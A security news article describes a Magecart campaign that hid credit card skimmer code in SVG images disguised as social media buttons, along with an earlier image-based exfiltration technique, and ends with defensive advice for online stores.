A gang of threat actors is using social media link buttons to hide malicious code that leads to a credit card skimmer. 

Innocuous Images Hide Credit Card Skimmer

These attacks, based on a web skimmer or Magecart script, infect checkout pages with a credit card skimmer, security firm Sanguine Security (SanSec) discovered in November 2020. 

First, attackers disguised the malicious payload, including the credit card skimmer, as an HTML <svg> element. They used syntax resembling legitimate use of Scalable Vector Graphics (SVG). This type of vector image format applies to two-dimensional graphics. To make the image appear safe, the gang named their payloads after one of at least six trusted social media companies. In doing so, they disguised the payload as social media buttons.

Second, they used a decoder to interpret and execute the payload. They could hide the decoder in a different location than their payload. Therefore, it became more difficult for organizations to figure out what was going on if they came across an unusual SVG file.

When a user checked out on an e-commerce site hosting these buttons, this payload activated the credit card number stealer. Threat actors could use the same technique to hide samples of other kinds of malware.

Credit Card Skimmer Concealed in an Image

This might be the first instance of a malicious payload being hidden as a valid image as part of a widespread campaign. But, it’s not the first time they’ve used an image in a credit card skimmer’s attack chain. (Broadly, this technique is also known as a steganography attack. A payload is hidden inside an innocuous image or audio file until it is opened by an online steganography decoder.)

In June 2020, SanSec detected a Magecart attack in which a credit card skimmer attached itself to the compromised checkout page’s submit button. Clicking that button caused the skimmer to seize, serialize and base64 encode the entire checkout form. The campaign then added a temporary image to the Document Object Module with a _preloader identifier. This image sat on the attackers’ server. Therefore, by adding the checkout data to the image address, the attackers were able to successfully exfiltrate the information.

SanSec detected other actors using the same technique in June last year in what could have been a test run for the concealment malware attack. The attackers succeeded in infecting just nine sites, and the credit card skimmer malware was active on just one of them. On all the rest, either the payload or the decoder was missing.

How to Defend Against Evasive Skimmers

Together, these attacks highlight the lengths to which attackers are willing to go in order to hide their malware. It also shows you can’t always detect malware by testing for valid syntax. 

First, organizations that have an online store need to work to prevent malicious actors from injecting a credit card skimmer into their checkout pages. They can do that by protecting the backends of their websites with strong passwords and multifactor authentication. They can also use vulnerability management to scan for security weaknesses that malicious actors could use in order to gain unauthorized access to their domains.

Organizations also need to invest in their ability to detect and respond to attacks such as a credit card skimmer. They can do this by using threat intelligence to stay on top of new attack techniques, leveraging network monitoring to spot data exfiltration attempts and keeping regular data and website backups to restore their websites to a known good state in the event that they detect a compromise.